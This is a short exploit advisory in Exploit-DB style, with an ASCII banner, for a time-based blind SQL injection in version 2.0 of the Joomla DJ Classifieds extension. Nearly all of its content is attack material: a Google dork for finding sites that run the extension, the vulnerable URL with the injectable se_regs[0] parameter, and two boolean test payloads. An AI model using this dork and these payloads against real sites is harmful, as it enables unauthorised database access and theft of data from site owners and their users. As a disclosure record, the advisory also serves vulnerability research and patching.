$$$$$$\ $$\ $$\ $$$$$$\ $$ __$$\ $$ | $$ | $$ __$$\ $$ / \__| $$ | $$ | $$ / \__| $$ |$$$$\ $$$$$$$$ | \$$$$$$\ $$ |\_$$ | $$ __$$ | \____$$\ $$ | $$ | $$ | $$ | $$\ $$ | \$$$$$$ |$$\ $$ | $$ |$$\\$$$$$$ | \______/ \__|\__| \__|\__|\______/ # Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection # Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/" # Date: 4/5/2013 # Exploit Author: Napsterakos # Vendor Homepage: http://design-joomla.eu # Software Link: - # Version: 2.0 # Tested on: Linux Link: http://server/joomla/index.php/dj-classifieds/ Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi] # Exploit-DB Note: # dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0 # dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1 Credits to: Greek Hacking Scene